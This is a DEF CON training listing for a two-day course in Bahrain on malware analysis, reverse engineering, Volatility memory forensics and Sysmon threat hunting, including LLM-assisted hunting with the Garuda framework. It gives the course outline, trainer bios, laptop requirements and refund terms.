A Complete Practical Approach to Malware Analysis & Threat Hunting with Memory Forensics, Endpoint Telemetry, & AI-Driven Hunting - Monnappa K A - DCTAC2025

Name of Training: A Complete Practical Approach to Malware Analysis & Threat Hunting with Memory Forensics, Endpoint Telemetry, & AI-Driven Hunting
Trainer(s): Monnappa K A and Sajan Shetty
Dates: November 3-4, 2025
Time: 8:00 am to 5:00 pm 
Venue: Exhibition World Bahrain
Cost: $2,200

Course Description: 

This 2-day intensive, hands-on training teaches the concepts, tools, and techniques required to analyze, investigate, and hunt malware by combining four powerful approaches: malware analysis, reverse engineering, memory forensics, and endpoint telemetry-based threat hunting. The course begins with the foundations of malware analysis, Windows internals, and memory forensics, before moving into advanced concepts of malware investigation and hunting adversary techniques.

Through real-world labs and scenarios, students will perform static, dynamic, code, and memory analysis; investigate real malware samples and infected memory images (crimeware, APT malware, rootkits, fileless threats); and analyze Sysmon/endpoint telemetry to detect persistence, lateral movement, and stealth techniques such as LOLBins abuse. By studying these behaviors, participants will gain a deep understanding of the latest adversary tactics, techniques, and procedures (TTPs) and apply this knowledge directly in investigative workflows.

What makes this training unique and future-ready is the introduction to the concept of AI-powered autonomous hunting with the Garuda Threat Hunting Framework. By integrating Garuda with Large Language Models (LLMs), participants will see how AI can accelerate event triaging, extract IOCs, map activity to MITRE ATT&CK, and even generate automated hunting reports — enabling analysts to hunt unknown threats without relying on traditional IOCs, signatures, or patterns. This demonstrates how AI augments human expertise and strengthens modern SOC operations.(AI hunting preview: https://youtu.be/Sk_c5w1CEiY)

By the end of the training, attendees will be fully equipped to detect, analyze, investigate, hunt, and respond to sophisticated cyber threats — combining hands-on technical expertise with AI-assisted hunting capabilities. These are essential skills for SOC analysts, incident responders, malware analysts, and threat hunters who want to stay ahead of today’s evolving threats.

Whether you are a beginner building your foundation or an experienced professional refining advanced skills, this training delivers the knowledge, tools, and practical labs you need to succeed.

What’s included:
Malware samples, infected memory images, course material, lab solution manual, video demos, custom scripts (including the Garuda Threat Hunting Framework with additional modules), and a preconfigured Linux VM for hands-on practice.

By the end of this training, participants will gain practical, real-world skills to:

• Build and operate a safe, isolated malware analysis lab.
  
• Understand malware internals, Windows internals, and adversary tradecraft.
  
• Perform static, dynamic, code-level, and memory-based malware analysis.
  
• Debug and reverse engineer malware using tools like IDA Pro and x64dbg.
  
• Investigate and analyze downloaders, droppers, backdoors, keyloggers, fileless malware, and rootkits.
  
• Detect and analyze advanced techniques such as persistence, process injection, code injection, and API hooking.
  
• Acquire and investigate infected memory images using Volatility and incorporate memory forensics into reverse engineering and sandbox automation workflows.
  
• Correlate Sysmon logs and endpoint telemetry with forensic artifacts to uncover stealth techniques (e.g., LOLBins).
  
• Analyze and triage network and host-based indicators (IOCs) in real-world attack scenarios.
  
• Hunt malware using endpoint telemetry and Sysmon logs with the Garuda Threat Hunting Framework.
  
• Integrate Garuda with Large Language Models (LLMs) for AI-powered autonomous hunting—accelerating event triage, IOC extraction, ATT&CK mapping, and automated report generation.
  

Course Outline: 

The following topics will be covered in this course:

Day 1:

Introduction to Malware Analysis
 - What is Malware
 - What they do
 - Why malware analysis
 - Types of malware analysis
 - Setting up an isolated lab environment

Static Analysis
 - Fingerprinting the malware
 - Extracting strings
 - Determining File Obfuscation
 - Pattern matching using YARA
 - Fuzzing hashing & comparison
 - Understanding PE File Characteristics
 - Disassembly
 - Hands-on lab exercise involves analyzing a real malware sample
 
Dynamic Analysis/Behavioural analysis
 - Dynamic Analysis Steps
 - Understanding Dynamic Analysis tools
 - Simulating services
 - Performing Dynamic Analysis
 - Monitoring process, filesystem, registry, and network activity
 - Determining the Indicators of compromise (host and network indicators)
 - Demo - Showing the static & dynamic analysis of real malware sample
 - Hands-on lab exercise involves analyzing a real malware sample

 Automating Malware Analysis(sandbox)
 - Custom Sandbox Overview
 - Working of Sandbox
 - Sandbox Features
 - Demo - Analyzing malware in the custom sandbox

Code Analysis
 - Code Analysis Overview
 - Disassemblers & Debuggers
 - Code Analysis Tools
 - Basics of IDA Pro
 - Basics of Ollydbg/x64dbg
 - Understanding the API calls
 - Reversing Malware functionalities(Downloader, dropper, keylogger, code injection, HTTP backdoor)
 - Hands-on lab exercise involves analyzing the real malware sample

Introduction to Memory Forensics
 - What is Memory Forensics
 - Why Memory Forensics
 - Steps in Memory Forensics
 - Memory acquisition and tools
 - Acquiring memory from a physical machine
 - Acquiring memory from the virtual machine
 - Hands-on exercise involves acquiring the memory

Volatility Overview
 - Introduction to Volatility Advanced Memory Forensics Framework
 - Volatility Installation
 - Volatility basic commands
 - Determining the profile
 - Volatility help options
 - Running the plugin

Day 2:

Investigating Process
 - Understanding Process Internals
 - Process(EPROCESS) Structure
 - Process organization
 - Process Enumeration by walking the double-linked list
 - process relationship (parent-child relationship)
 - Understanding DKOM attacks
 - Process Enumeration using pool tag scanning
 - Volatility plugins to enumerate processes
 - Identifying malware process
 - Hands-on lab exercise(scenario-based) involves investigating malware-infected memory

Investigating Process handles & Registry
 - Objects and handles overview
 - Enumerating process handles using Volatility
 - Understanding Mutex
 - Detecting malware presence using the mutex
 - Understanding the Registry
 - Investigating common registry keys using Volatility
 - Detecting malware persistence
 - Hands-on lab exercise (scenario-based) involves investigating malware-infected memory

Investigating Network Activities
 - Understanding malware network activities
 - Volatility Network Plugins
 - Investigating Network connections
 - Investigating Sockets
 - Hands-on lab exercise(scenario-based) involves investigating malware-infected memory

Investigation Process Memory
 - Process Memory Internals
 - Listing DLLs using Volatility
 - Identifying hidden DLLs
 - Dumping malicious executable from memory
 - Dumping DLLs from memory
 - Scanning the memory for patterns(yarascan)
 - Hands-on lab exercise(scenario-based) involves investigating malware-infected memory

Investigating User-Mode Rootkits & Fileless Malwares
 - Code Injection
 - Types of Code Injection
 - Remote DLL injection
 - Remote Code Injection
 - Reflective DLL injection
 - Hollow process injection
 - Demo - Case Study
 - Hands-on lab exercise(scenario-based) involves investigating malware-infected memory

Investigating Kernel-Mode Rootkits
 - Understanding Rootkits
 - Understanding Functional call traversal in Windows
 - Level of Hooking/Modification on Windows
 - Kernel Volatility plugins
 - Hands-on lab exercise(scenario-based) involves investigating malware-infected memory

Threat Hunting Using Event Triaging
 - Introduction to Sysmon
 - Understanding Sysmon Events
 - Introduction to Garuda Threat Hunting Framework
 - Filtering Sysmon events using Garuda
 - Living off the Land attacks
 - Demo: Hunting LoLbins (Living of the land binary) and multi-staged attacks

AI-Powered Threat Hunting
 - Introduction to AI in threat detection & hunting
 - Introduction to MCP (Model Context Protocol)
 - Exposing Tools to the LLM
 - Integrating the Garuda Framework with the AI application.
 - How Garuda + AI can triage events, identify IOCs, and Map events to ATT&CK Techniques
 - Demo: AI-powered autonomous Threat hunting to hunt for complex attack patterns.

Difficulty Level: 

This course starts with the basics and then gradually progresses deep into more advanced concepts, so this course is suitable for both Beginners and Intermediate students. 

Suggested Prerequisites:

• Students should be familiar with using Windows/Linux
• Students should have an understanding of basic programming concepts, while programming experience is not mandatory.

What Students Should Bring:

• Laptop with a minimum of 6GB RAM and 40GB free hard disk space
  
• Laptop with USB ports - lab samples and custom Linux VM will be shared via USB sticks
  
• VMware Workstation or VMware Fusion (even trial versions can be used)
  
• Windows Operating system (preferably 64-bit versions of Windows 11 or Windows 10) installed inside VMware Workstation/Fusion. Students must have full administrator access to the Windows operating system installed inside the VMware Workstation/Fusion

Registered students will be provided with a laptop setup guide containing step-by-step instructions and the required software. This will be provided 15 days before the training

Note: VMware Player or VirtualBox is not suitable for this training. Apple systems using the M1, M2, or M3 processor line cannot perform the necessary virtualization functionality; therefore, they are not suitable for this course.

Students will be provided with:

• Course material (PDF copy)
  
• Lab solution material
  
• Videos used in the course
  
• Malware samples used in the course/labs
  
• Memory Images used in the course/labs
  
• Linux VM (to be opened with VMware Workstation/Fusion) containing necessary tools and samples
  
• Custom Scripts (Including Garuda Framework and custom modules)

Trainer(s) Bio:

Monnappa K A is a Security professional with over 17 years of experience in incident response, investigation & threat hunting. He previously worked for Microsoft & Cisco as a threat hunter, mainly focusing on investigation and research of advanced cyber attacks.He is the author of the best-selling book Learning Malware Analysis, and serves on the review board for Black Hat Asia, Black Hat USA, and Black Hat Europe. He is the creator of the Garuda Threat Hunting Framework, Limon Linux sandbox, and the winner of the Volatility Plugin Contest 2016. He co-founded the cybersecurity research community Cysinfo (https://www.cysinfo.com). Monnappa has trained thousands of security professionals globally through his highly acclaimed hands-on training sessions on malware analysis, reverse engineering, memory forensics, and threat hunting at major conferences such as Black Hat (USA, Europe, Asia, MEA), DEFCON, BruCON, HITB, FIRST (Forum of Incident Response and Security Teams), SEC-T, OPCDE, and 4SICS-SCADA/ICS cybersecurity summit. He has also presented at numerous security conferences, including Black Hat, DEFCON, FIRST, DSCI, National Cyber Defence Summit, Bharat NCX, and Cysinfo meetings, covering topics related to threat hunting, memory forensics, malware analysis, and reverse engineering. In addition, he has authored articles for eForensics and Hakin9 magazines. You can find some of his contributions to the community on his YouTube channel (http://www.youtube.com/c/MonnappaKA), and you can read his blog posts at https://cysinfo.com  
Twitter: @monnappa22

Sajan Shetty is a cybersecurity enthusiast. He is an active member of Cysinfo, an open Cyber Security Community (https://www.cysinfo.com) committed to educating, empowering, inspiring, and equipping cybersecurity professionals and students to better fight and defend against cyber threats. He has conducted training sessions at Black Hat Asia, Black Hat USA, Black Hat Europe, DEF CON, Black Hat SecTor, Black Hat Middle East, Black Hat Spring, BruCON, HITB, and his primary fields of interest include Artificial Intelligence, malware analysis, and memory forensics. He has various certifications in machine learning and is passionate about applying machine learning techniques to solve cybersecurity problems.

Registration Terms and Conditions: 

Trainings are refundable before October 2, 2025, minus a non-refundable processing fee of $250.

Trainings are non-refundable after October 2, 2025.

Training tickets may be transferred. Please email us at training@defcon.org for specifics.

If a training does not reach the minimum registration requirement, it may be cancelled. In the event the training you choose is cancelled, you will be provided the option of receiving a full refund or transferring to another training (subject to availability).

Failure to attend the training without prior written notification, will be considered a no-show. No refund will be given.

By purchasing this ticket you agree to abide by the DEF CON Training Code of Conduct and the registration terms and conditions listed above.

Several breaks will be included throughout the day. Please note that food is not included.

All courses come with a certificate of completion, contingent upon attendance at all course sessions.